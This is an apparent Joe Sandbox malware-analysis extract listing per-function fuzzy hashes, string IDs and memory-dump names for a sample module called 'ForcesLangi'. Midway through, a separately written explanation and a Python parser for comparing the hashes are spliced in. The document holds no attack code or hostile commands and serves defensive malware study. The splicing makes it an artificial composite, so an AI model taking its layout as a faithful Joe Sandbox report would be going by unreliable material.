                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "xD;$"xD;
                                                                                                                                                                                                                                              • API String ID: 0-2864981526
                                                                                                                                                                                                                                              • Opcode ID: 2193f10a5a8fc40357047bd6ab7ca9a5dc93f2b4f4ec6a431a78ad1cb2b83ff7
                                                                                                                                                                                                                                              • Instruction ID: 35674e15b204143e6a162b3aee01e3c4a83ba64c6e6fc104c7262966c0bd7685
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2193f10a5a8fc40357047bd6ab7ca9a5dc93f2b4f4ec6a431a78ad1cb2b83ff7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15C22576B496418FCF04CEBCC6953CD7BF2AB43364F349514D421DBB98D62E892A8B81
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Vmp$Vmp
                                                                                                                                                                                                                                              • API String ID: 0-3901100813
                                                                                                                                                                                                                                              • Opcode ID: 289c027b29b7eefbef0ec21a6da14beba24c40d0550da31d88031ff497433c75
                                                                                                                                                                                                                                              • Instruction ID: c4173da0f8efe730845e8868af51c7c0eaee55206e620693a12b2600c5cab304
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 289c027b29b7eefbef0ec21a6da14beba24c40d0550da31d88031ff497433c75
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57B20E7AA552028FDF08CE7CD5D93CE77F2AB53364F3481159862DBB95C62E890A8F40
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f60eb36aa6478aace6beeccf11c6d46a6a1f3143be03206460dead8c38e9ef10
                                                                                                                                                                                                                                              • Instruction ID: 5814fa30c3ad990a82d0b592aac91fb3faf5c73d85a31e7b4d9bb35d9d86a2c0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f60eb36aa6478aace6beeccf11c6d46a6a1f3143be03206460dead8c38e9ef10
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F12876B496118FDF048EBCD4D53DE7BF2AB4B324F206619C415BBB94C22A841ECB51
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 138b193b12ff7994e53b35290106f589f441eb157fbf0e37fe7476682fe6f370
                                                                                                                                                                                                                                              • Instruction ID: e7d7d1957c7a56c6441dfc0e2f5b15fd19c8865ec6e731a2649fa7a074466924
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 138b193b12ff7994e53b35290106f589f441eb157fbf0e37fe7476682fe6f370
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55D10376E416068FDF04CE7CC9D57EE77F29B47324F248525C522DBB94C22E8A0A8B41
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: QP,m$\w!u
                                                                                                                                                                                                                                              • API String ID: 0-581249642
                                                                                                                                                                                                                                              • Opcode ID: 24df9089ac75e435283f65e715bb53468a6bc79b613cbd85605655fac0a6a885
                                                                                                                                                                                                                                              • Instruction ID: ef576043ff095fb7acb2a7a1efe06e33ba4231d16a840b1f198027c32ab89f20
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24df9089ac75e435283f65e715bb53468a6bc79b613cbd85605655fac0a6a885
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3932573AA446118FDF04CEBCC5953DE77F2AB57325F359219E521EBB94C22E890ACB40
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: _Nx5$_Nx5
• API String ID: 0-2428191651
• Opcode ID: 8fe4fc08cf86152e33d047b9fd818372178bfda8a17f7e915d10948e1804e44d
• Instruction ID: 5810a62a46ed984d7fac0e2427b63f9d0fe6d090af8776263a2998822d92afb1
• Opcode Fuzzy Hash: 8fe4fc08cf86152e33d047b9fd818372178bfda8a17f7e915d10948e1804e44d
• Instruction Fuzzy Hash: 0E22E03AB15A058FCF04CEBCD5D12DD7BF2AB86314F34852AE451E7790D23A990ACB81

Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: ~E$~E
• API String ID: 0-2867264573
• Opcode ID: cfb0858f5fbafeeaddaaf5655af7d9568565dd30e169e5fa367a28077ae42e78
• Instruction ID: fccfcf98bb5793d644f3ee335a880be125656a9d459cf1466a88afe968e8edc6
• Opcode Fuzzy Hash: cfb0858f5fbafeeaddaaf5655af7d9568565dd30e169e5fa367a28077ae42e78
• Instruction Fuzzy Hash: 66127636A515418FCF04CE7CC9D53CE7BF2AB4B325F38521AD511EBB98C22E890A9B14

Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: @kOW$@kOW
• API String ID: 0-2146169918
• Opcode ID: aa5f07ea1169338d8d6470aa37088b072c258cc8b1d3877aa3657a23a9940a71
• Instruction ID: ecbbf0faf5a3f744079408b4bc4573af567b2056f1fc989c099d67e7151ae0ec
• Opcode Fuzzy Hash: aa5f07ea1169338d8d6470aa37088b072c258cc8b1d3877aa3657a23a9940a71
• Instruction Fuzzy Hash: 16023376A852048FDF08CEBCD5C53CE7BF2AB87328F346115D411E7B94D22E990A8B91

Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: (g5$(g5
• API String ID: 0-4174432146
• Opcode ID: 97295da8a7794ed843c967c9d229ea6b7f979918f1aa96fd44a195d2e57fabc0
• Instruction ID: 090a5e64a5e3a56a7421154e4b15419b45be2eac7b438581121db4ebc6f3cbb5
• Opcode Fuzzy Hash: 97295da8a7794ed843c967c9d229ea6b7f979918f1aa96fd44a195d2e57fabc0
• Instruction Fuzzy Hash: 95022176B495058FCB08CEFCC1953DE77F29B6B325F20A119D421E7F94C52ACA0A8B94

Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: "\UA$"\UA
• API String ID: 0-1621468777
• Opcode ID: f77219d2444bd6a1909b6e7beb5d7a1d91dad2f241c97654193c084212413698
• Instruction ID: 3c462d193dd34ca19a65df857200d653b6eb32b12b89302cfd781c516a305abc
• Opcode Fuzzy Hash: f77219d2444bd6a1909b6e7beb5d7a1d91dad2f241c97654193c084212413698
• Instruction Fuzzy Hash: AFF12936B526068FDF048D7CCAD53EE3BF2AB433A5F349515D511DBB98C62E890A8780

Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: r[}"$r[}"
• API String ID: 0-765748070
• Opcode ID: 0346caeb35a8146e9998bb5d8199b7f41d97298020003ee21e67a02f05ac2a99
• Instruction ID: 3097553bc57c82cde4e044b9ed24718ba4ff6abf5ccac1f606ecff7ccdb4e3d3
• Opcode Fuzzy Hash: 0346caeb35a8146e9998bb5d8199b7f41d97298020003ee21e67a02f05ac2a99
• Instruction Fuzzy Hash: 30F14936B491418FCF08CE7CDA967CD7BF2AB8B364F245619D811EBFD4C22A45698B10

Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: dQV;$dQV;
• API String ID: 0-3760431708
• Opcode ID: aae4b23577271d6a073f48758bf148101855a4453085db47b56671999b5703f0
• Instruction ID: 15223c4b7978d87ceb55723f184339855f145706e1bfb929e251b8b6489c2f4c
• Opcode Fuzzy Hash: aae4b23577271d6a073f48758bf148101855a4453085db47b56671999b5703f0
• Instruction Fuzzy Hash: CFF12136B091058FCF088EBCC9953DD7BF2AB6B354F249619C411EBF94D22A8D0ACB54
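
The blocks above are Joe Sandbox's per-function similarity metadata for the module dumped at 6CDF0000: each function carries an Opcode ID, an Instruction ID and two fuzzy hashes, plus the strings it references. Comparing these hashes across reports is the practical use of this listing (code reuse between samples, shared packer stubs), and that is easier with the blocks parsed into records than read off the page. The parser below is an added example, not Joe Sandbox code. It assumes that a block opens at the "Strings" heading, that the "Download File" text glued onto dump names is link residue from extraction, and that the report joins several String ID values with "$" (the "~E$~E" form seen above); the sample input is constructed in the shape of the blocks on this page, and the dump-file name fields are carried through without interpreting them.

```python
"""Parse the per-function similarity blocks of a Joe Sandbox report.

Added example, not Joe Sandbox code. Turns the repeated
Strings / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity
blocks into records so fuzzy hashes can be compared across reports.
Assumptions are marked inline.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# "• Key: value" lines; the key is the label before the first colon.
BULLET = re.compile(r"^[•*-]?\s*([A-Za-z ]+?):\s*(.*)$")
# "<dump>.sdmp, Offset: <hex>, based on PE: true|false"
SOURCE = re.compile(
    r"^(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$"
)
LINK_RESIDUE = "Download File"   # link text that HTML extraction glues onto dump names


@dataclass
class FunctionRecord:
    source_dump: str = ""
    offset: Optional[int] = None          # module base the dump was taken at
    based_on_pe: Optional[bool] = None
    associated: List[str] = field(default_factory=list)
    snapshot_file: str = ""
    api_ids: List[str] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy_hash: str = ""
    instruction_fuzzy_hash: str = ""


def clean_line(raw: str) -> str:
    """Drop layout indentation and the 'Download File' link residue."""
    s = raw.strip()
    if s.endswith(LINK_RESIDUE):
        s = s[: -len(LINK_RESIDUE)].rstrip()
    return s


def split_ids(value: str) -> List[str]:
    # Assumption: the report joins several IDs/strings with '$' ("~E$~E").
    return [v for v in value.split("$") if v]


def parse_blocks(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = clean_line(raw)
        if not line:
            continue
        if line == "Strings":            # every function block opens with this heading
            cur = FunctionRecord()
            records.append(cur)
            continue
        m = BULLET.match(line)
        if cur is None or not m:         # sub-headings, or a block cut off at the top
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            sm = SOURCE.match(value)
            if sm:
                cur.source_dump = sm.group("dump")
                cur.offset = int(sm.group("offset"), 16)
                cur.based_on_pe = sm.group("pe") == "true"
        elif key == "Associated":
            cur.associated.append(value)
        elif key == "Snapshot File":
            cur.snapshot_file = value
        elif key == "API ID":
            cur.api_ids = split_ids(value)
        elif key == "String ID":
            cur.strings = split_ids(value)
        elif key == "API String ID":
            cur.api_string_id = value
        elif key == "Opcode ID":
            cur.opcode_id = value
        elif key == "Instruction ID":
            cur.instruction_id = value
        elif key == "Opcode Fuzzy Hash":
            cur.opcode_fuzzy_hash = value
        elif key == "Instruction Fuzzy Hash":
            cur.instruction_fuzzy_hash = value
    return records


def opcode_hash_consistent(rec: FunctionRecord) -> bool:
    """On this page the Opcode ID repeats the Opcode Fuzzy Hash; flag any drift."""
    return rec.opcode_id == rec.opcode_fuzzy_hash


def shared_code(a: List[FunctionRecord], b: List[FunctionRecord]) -> List[str]:
    """Instruction fuzzy hashes present in both record sets (code-reuse hint)."""
    return sorted({r.instruction_fuzzy_hash for r in a} & {r.instruction_fuzzy_hash for r in b})


# Constructed sample in the shape of the blocks on this page (two functions).
SAMPLE = """
Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: ~E$~E
• API String ID: 0-2867264573
• Opcode ID: cfb0858f5fbafeeaddaaf5655af7d9568565dd30e169e5fa367a28077ae42e78
• Instruction ID: fccfcf98bb5793d644f3ee335a880be125656a9d459cf1466a88afe968e8edc6
• Opcode Fuzzy Hash: cfb0858f5fbafeeaddaaf5655af7d9568565dd30e169e5fa367a28077ae42e78
• Instruction Fuzzy Hash: 66127636A515418FCF04CE7CC9D53CE7BF2AB4B325F38521AD511EBB98C22E890A9B14
Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: @kOW$@kOW
• API String ID: 0-2146169918
• Opcode ID: aa5f07ea1169338d8d6470aa37088b072c258cc8b1d3877aa3657a23a9940a71
• Instruction ID: ecbbf0faf5a3f744079408b4bc4573af567b2056f1fc989c099d67e7151ae0ec
• Opcode Fuzzy Hash: aa5f07ea1169338d8d6470aa37088b072c258cc8b1d3877aa3657a23a9940a71
• Instruction Fuzzy Hash: 16023376A852048FDF08CEBCD5C53CE7BF2AB87328F346115D411E7B94D22E990A8B91
"""

if __name__ == "__main__":
    for r in parse_blocks(SAMPLE):
        print(hex(r.offset), r.instruction_fuzzy_hash, r.strings, opcode_hash_consistent(r))
```

Feed the text of the whole function listing to parse_blocks and compare shared_code() between two reports; a large overlap of Instruction Fuzzy Hashes between otherwise unrelated samples usually points at a common packer or runtime stub rather than the payload, so check which module base (offset) the matching functions came from before drawing conclusions.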
                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              • String ID: NybH
                                                                                                                                                                                                                                              • API String ID: 0-778265418
                                                                                                                                                                                                                                              • Opcode ID: 9c0152588228ff3620c6441fd413e2ce87eb0d097b553140db5572f3a938a2c9
                                                                                                                                                                                                                                              • Instruction ID: 514922fb73df610166b9d6f931b825c5ca691359f67a158b4e6733c9c283ec63
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c0152588228ff3620c6441fd413e2ce87eb0d097b553140db5572f3a938a2c9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75323476A495418FCF048E7CC5953DE3BF6EB47364F30A219D825EBB95C63A890ACB40
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                                                                                              • API String ID: 0-410509341
                                                                                                                                                                                                                                              • Opcode ID: 2833791a1c12f7b3fffa124362b885ba041d1b4b3055d3f048b54c4aec56d951
                                                                                                                                                                                                                                              • Instruction ID: 42b7556d00b975c078b2d7c5f9c6686c1174828c527e7a539fe052ad707d43c7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2833791a1c12f7b3fffa124362b885ba041d1b4b3055d3f048b54c4aec56d951
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07120376A456058FDF14CE7CD5D43CD7BF2AB47328F30A216D921EBB94D22E890A8B14
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: g}TJ
                                                                                                                                                                                                                                              • API String ID: 0-2470632315
                                                                                                                                                                                                                                              • Opcode ID: 6feab2497fa58f3d11b5f3095cbb8e9a23c579e4031644c895a7c611c329fb06
                                                                                                                                                                                                                                              • Instruction ID: 1a67a3c3f99518f9fcaee7846e0ef773a8b243f9a04ebcc4519bc6b5aee16a53
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6feab2497fa58f3d11b5f3095cbb8e9a23c579e4031644c895a7c611c329fb06
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF020336B4A5418FCB048D7CD8D57EE77F2AB47368F305529C421DBF94C62A890A8B91
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: t70p
                                                                                                                                                                                                                                              • API String ID: 0-1803443213
                                                                                                                                                                                                                                              • Opcode ID: 1bbb16efe10b4fb3d6d78aa450d4e50cc86e8e85607820d447311bb88b55e184
                                                                                                                                                                                                                                              • Instruction ID: a783cc32f762b0a15b996ec0aa407ba0a7974888724f4f796979ad07beaf8f1e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1bbb16efe10b4fb3d6d78aa450d4e50cc86e8e85607820d447311bb88b55e184
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F812EE36A556048FCB08CE7CD5917DD7BF2AB8B314F20A119E425EB7A4C63E890ACB15
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • bmnvidjapmuqvqlivxazircppbjomunmxpjyeiwubtphnmhendbjxyloyarbch, xrefs: 6CDF1583
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: bmnvidjapmuqvqlivxazircppbjomunmxpjyeiwubtphnmhendbjxyloyarbch
                                                                                                                                                                                                                                              • API String ID: 0-3515426038
